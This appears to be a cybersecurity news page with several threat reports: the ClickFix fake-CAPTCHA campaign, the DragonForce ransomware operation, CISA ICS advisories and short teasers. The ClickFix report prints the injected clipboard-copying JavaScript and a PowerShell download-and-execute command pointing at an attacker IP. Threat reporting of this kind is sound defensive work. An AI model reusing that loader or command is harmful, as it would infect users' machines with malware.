A sophisticated cybercrime operation has emerged, targeting unsuspecting internet users through a deceptive social engineering technique that exploits one of the web’s most trusted security mechanisms.
Since June 2024, the financially motivated threat group UNC5518 has been systematically compromising legitimate websites to inject malicious fake CAPTCHA verification pages, tricking visitors into unknowingly executing malware on their systems.
The attack campaign, dubbed “ClickFix” by security researchers, represents a particularly insidious form of social engineering that leverages users’ familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they are presented with what appears to be a standard reCAPTCHA interface, complete with the familiar “I’m not a robot” checkbox and Google branding.
However, clicking on this seemingly innocuous element triggers a malicious JavaScript payload that automatically copies a PowerShell command to the user’s clipboard.
Google Cloud analysts identified that UNC5518 operates as an access-as-a-service provider, partnering with multiple affiliate threat groups to monetize their initial compromise capabilities.
The group’s sophisticated infrastructure supports various downstream actors, including UNC5774, which specializes in deploying the CORNFLAKE.V3 backdoor, and UNC4108, known for utilizing PowerShell-based tools and conducting extensive network reconnaissance.
Attack lifecycle (Source – Google Cloud)
The technical execution of this attack demonstrates remarkable attention to detail in mimicking legitimate web security practices.
The malicious JavaScript embedded within compromised websites creates a convincing CAPTCHA interface using code that closely resembles authentic Google reCAPTCHA implementations.
When victims interact with the fake verification system, the following code executes silently in the background:-
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document[.]execCommand("copy");
This script automatically copies a carefully crafted PowerShell command to the victim’s clipboard, which appears as: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex".
The command is designed to download and execute additional malware payloads from attacker-controlled infrastructure.
Infection Mechanism and Payload Delivery
The ClickFix technique exploits a critical weakness in user behavior patterns, capitalizing on the widespread acceptance and trust associated with CAPTCHA systems.
Once the malicious PowerShell command is copied to the clipboard, victims are typically instructed through on-screen prompts to paste and execute the command using the Windows Run dialog (Windows+R), believing they are completing a legitimate verification process.
Upon execution, the PowerShell script initiates a sophisticated multi-stage infection chain that includes comprehensive anti-analysis measures.
The malware performs environment checks to detect virtual machines and sandboxes, examining system memory configurations and manufacturer information to evade security research environments.
If these checks pass, the script downloads Node.js runtime components from legitimate sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent access through registry modifications and enables comprehensive system reconnaissance activities including Active Directory enumeration and Kerberoasting credential harvesting techniques.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Security researchers have uncovered a critical series of vulnerabilities in Commvault’s backup and data management software that could enable attackers to achieve remote code execution and compromise on-premises infrastructure. The flaws, discovered by Watchtowr Labs, represent a significant threat to organizations relying on Commvault’s widely-deployed backup solutions. The vulnerability chain consists of four distinct security […]
DragonForce represents a sophisticated and rapidly evolving ransomware operation that has emerged as a significant threat in the cybersecurity landscape since late 2023.
Operating under a Ransomware-as-a-Service (RaaS) model, this group has demonstrated exceptional adaptability by leveraging leaked ransomware builders from notorious families like LockBit 3.0 and Conti to create customized attack variants.
The organization has successfully targeted high-profile victims across multiple sectors, including government entities, retail giants, and critical infrastructure, with notable attacks against the Ohio Lottery, Palau government, and major UK retailers like Marks & Spencer.
Their operations combine advanced technical capabilities with professional business practices, offering affiliates up to 80% of ransom payments while providing comprehensive attack infrastructure and support services.
DragonForce first appeared in December 2023 with the launch of their “DragonLeaks” dark web portal, quickly establishing themselves as a formidable player in the ransomware ecosystem.
The group’s origins trace back to possible connections with DragonForce Malaysia, a hacktivist collective, though the current operation has evolved into a purely profit-driven enterprise.
By 2025, DragonForce has matured into a sophisticated RaaS platform that attracts both displaced affiliates from dismantled ransomware operations and freelance threat actors seeking robust infrastructure.
The organization operates two distinct ransomware variants based on leaked source code from established families. Their initial variant utilized the leaked LockBit 3.0 (Black) builder, allowing them to rapidly deploy effective ransomware without developing complex encryption mechanisms from scratch.
In July 2024, DragonForce introduced a second variant based on the Conti V3 codebase, providing affiliates with enhanced customization capabilities. This dual-variant approach demonstrates the group’s technical sophistication and commitment to providing affiliates with diverse attack options.
The group’s business model reflects modern cybercrime trends, offering a comprehensive platform that includes attack management tools, automated features, and customizable builders.
Affiliates can tailor ransomware samples by disabling targeted security features, configuring encryption parameters, and personalizing ransom notes.
In early 2025, DragonForce expanded its offerings by introducing a white-label ransomware service, enabling affiliates to rebrand payloads under alternative names for additional fees.
Attack Vectors and Initial Access Techniques
DragonForce employs multiple sophisticated vectors to achieve initial access to target networks, demonstrating the group’s understanding of diverse organizational vulnerabilities.
Phishing campaigns remain a primary attack vector, with operators crafting convincing spear-phishing emails containing malicious attachments or links that deploy ransomware payloads when executed by unsuspecting users.
These campaigns often target specific individuals within organizations using social engineering techniques to increase success rates.
Exploitation of known vulnerabilities represents another critical attack vector, with DragonForce operators actively targeting unpatched systems.
The group has specifically been associated with exploiting several high-impact vulnerabilities, including CVE-2021-44228 (Log4Shell), CVE-2023-46805 (Ivanti Connect Secure Authentication Bypass), CVE-2024-21412 (Microsoft Windows SmartScreen Bypass), CVE-2024-21887 (Ivanti Connect Secure Command Injection), and CVE-2024-21893 (Ivanti Connect Secure Path Traversal).
DragonForce affiliates systematically target organizations with poorly secured remote access infrastructure, leveraging stolen or weak credentials to establish a persistent network presence.
The group also exploits trusted relationships, as demonstrated in a recent incident where attackers gained access through remote management software installed by a previous hosting company that was never properly removed.
In some cases, DragonForce operators have gained initial access by exploiting compromised managed service provider (MSP) relationships, allowing them to move laterally across multiple client environments through trusted connections.
This technique amplifies the impact of individual breaches by providing access to numerous organizations through a single compromise point.
Remote Desktop Protocol (RDP) and VPN attacks constitute significant initial access methods, with operators conducting credential stuffing attacks and brute-force operations against exposed services.
Cyber Kill Chain. (Source: cybersecuritynews.com)
Tactics, Techniques, and Procedures (TTPs)
DragonForce’s operational methodology follows the MITRE ATT&CK framework across multiple tactics, demonstrating a sophisticated understanding of enterprise network compromise techniques.
Exploits compromised MSP relationships and previous hosting company access
Medium
High
Execution
T1204.002
Malicious File
Social engineering users to execute ransomware payloads, moves files to System32
High
Low
Execution
T1059.001
PowerShell
Uses PowerShell for command execution, payload deployment, and system reconnaissance
High
Medium
Execution
T1053.005
Scheduled Task/Job
Creates scheduled tasks for persistence and automated execution
Medium
Low
Persistence
T1574.011
Services File Permissions Weakness
Installs AnyDesk remote access tool for persistent backdoor access
High
Medium
Persistence
T1053.005
Scheduled Task/Job
Establishes scheduled tasks to maintain persistence across reboots
Medium
Low
Persistence
T1547.001
Registry Run Keys / Startup Folder
Modifies registry Run keys to ensure malware execution at startup
Medium
Low
Privilege Escalation
T1134
Access Token Manipulation
Duplicates SYSTEM-level access tokens using DuplicateTokenEx() API
High
High
Privilege Escalation
T1068
Exploitation for Privilege Escalation
Leverages known vulnerabilities for escalation to administrator privileges
Medium
Medium
Defense Evasion
T1027
Obfuscated Files or Information
Embeds Chinese text signatures, uses code obfuscation techniques
High
High
Indicators of Compromise (IoCs)
Security teams should monitor for specific indicators associated with DragonForce campaigns to enable early detection and response.
Network indicators include command and control server IP addresses: 2[.]147[.]68[.]96, 185[.]59[.]221[.]75, and 69[.]4[.]234[.]20. Notably, early campaign infrastructure was identified in Iran, suggesting international collaboration or infrastructure rental.
The Marks & Spencer incident in April 2025 caused estimated losses of £300 million and months-long operational disruption, with attackers sending direct emails to the CEO demanding ransom payments.
These cases illustrate DragonForce’s capability to target both government infrastructure and private sector organizations with devastating effectiveness, emphasizing the critical need for comprehensive cybersecurity measures and incident response planning.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The financially motivated threat group UNC5518 has been infiltrating trustworthy websites to install ClickFix lures, which are misleading phony CAPTCHA pages, as part of a complex cyber campaign that has been monitored since June 2024. These malicious pages trick users into executing downloader scripts that initiate infection chains, often leading to malware deployment by affiliated […]
Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024.
Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT,
As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing
Cybersecurity researchers are highlighting a dangerous attack technique that combines rogue IPv6 configuration with NTLM credential relay to achieve complete Active Directory domain compromise, exploiting default Windows configurations that most organizations leave unchanged. Attack Leverages Default Windows IPv6 Behavior The MITM6 + NTLM Relay attack exploits Windows systems’ automatic DHCPv6 requests, even in networks that […]
CISA issued four comprehensive Industrial Control Systems (ICS) advisories on August 19, 2025, highlighting serious vulnerabilities affecting critical infrastructure sectors including energy and manufacturing.
These advisories detail exploitable vulnerabilities with CVSS scores ranging from 5.8 to 9.8, requiring immediate attention from system administrators and security professionals.
Key Takeaways 1. CISA issued four ICS advisories for Siemens, Tigo Energy, and EG4 systems affecting critical infrastructure. 2. Critical vulnerabilities (CVSS up to 9.8) enable remote attacks and system compromise. 3. Update immediately - Apply vendor patches and implement network segmentation.
Critical Siemens Vulnerabilities
Two significant Siemens advisories were released addressing distinct attack vectors. Advisory ICSA-25-231-01 covers the Desigo CC Product Family and SENTRON Powermanager, identifying a least privilege violation (CWE-272) vulnerability tracked as CVE-2025-47809 with a CVSS v3.1 score of 8.2.
This vulnerability affects Wibu CodeMeter components across multiple product versions (V5.0 through V8), enabling privilege escalation through the CodeMeter Control Center component immediately after installation.
The second Siemens advisory, ICSA-25-231-02, addresses the Mendix SAML Module with a more severe improper verification of cryptographic signature (CWE-347) vulnerability.
CVE-2025-40758 carries a CVSS v3.1 score of 8.7 and enables unauthenticated remote attackers to hijack accounts in specific Single Sign-On (SSO) configurations.
The vulnerability affects multiple Mendix versions, with patches available requiring updates to V3.6.21, V4.0.3, or V4.1.2 depending on the deployment.
Tigo and EG4 Infrastructure Vulnerabilities
The energy sector faces particularly severe threats with two advisories targeting solar energy infrastructure.
ICSA-25-217-02 addresses Tigo Energy’s Cloud Connect Advanced devices with three critical vulnerabilities: hard-coded credentials (CWE-798), command injection (CWE-77), and predictable PRNG seeds (CWE-337).
CVE-2025-7768 received the highest CVSS v4 score of 9.3, while CVE-2025-7769 and CVE-2025-7770 both scored 8.7.
EG4 Electronics inverters, covered in advisory ICSA-25-219-07, present four distinct vulnerabilities including cleartext transmission (CWE-319), firmware integrity issues (CWE-494), observable discrepancies (CWE-203), and authentication bypass (CWE-307).
The most critical, CVE-2025-46414, achieved a CVSS v4 score of 9.2, though EG4 deployed server-side fixes for some vulnerabilities in April 2025.
Mitigations
Siemens requires CodeMeter updates to version 8.30a and enables UseEncryption configurations for SAML modules.
Tigo Energy is developing comprehensive fixes, while EG4 has implemented server-side patches and plans new hardware releases by October 15, 2025.
CISA emphasizes implementing defense-in-depth strategies, including network segmentation, VPN-secured remote access, and firewall isolation.
Organizations should prioritize impact analysis and risk assessment before deploying defensive measures, while monitoring for suspicious activity and reporting incidents to CISA for correlation analysis.
No public exploitation has been reported for these specific vulnerabilities, providing a critical window for remediation efforts.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →
Researchers at Push Security have discovered a new phishing campaign that targets Microsoft 365 (M365) systems and uses Active Directory Federation Services (ADFS) to enable credential theft. This attack vector exploits Microsoft’s authentication redirect mechanisms, effectively turning a legitimate service into a conduit for phishing operations. Sophisticated Phishing Infrastructure The campaign begins with malvertising lures […]
Security researchers at Imperva have disclosed a critical pre-handshake memory exhaustion vulnerability in the widely-used LSQUIC QUIC implementation that enables remote attackers to crash servers through denial-of-service attacks. The flaw, designated CVE-2025-54939 and dubbed “QUIC-LEAK,” bypasses standard QUIC connection-level protections by triggering before any handshake is established, leaving servers vulnerable to unbounded memory growth and […]
.webp)
